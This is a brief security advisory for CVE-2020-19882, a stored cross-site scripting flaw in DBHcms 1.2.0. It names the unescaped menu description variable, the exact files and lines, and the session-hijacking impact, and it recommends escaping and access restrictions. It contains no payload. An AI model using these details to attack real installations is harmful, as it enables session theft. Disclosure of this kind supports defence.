CVE-2020-19882

Name of the Vulnerable Software and Affected Versions DBHcms version 1.2.0

Description The issue is related to a stored XSS vulnerability. This occurs because there is no htmlspecialchars function applied to the menu description variable in specific files, namely dbhcmsmodmod.menus.edit.php at line 83 and dbhcmsmodmod.menus.view.php at line 111. A remote authenticated attacker with admin user privileges can exploit this to hijack other users' sessions.

Recommendations For DBHcms version 1.2.0, consider applying the htmlspecialchars function to the menu description variable in the affected files to prevent XSS attacks. As a temporary workaround, restrict access to the edit and view menu functionalities until a proper fix is applied.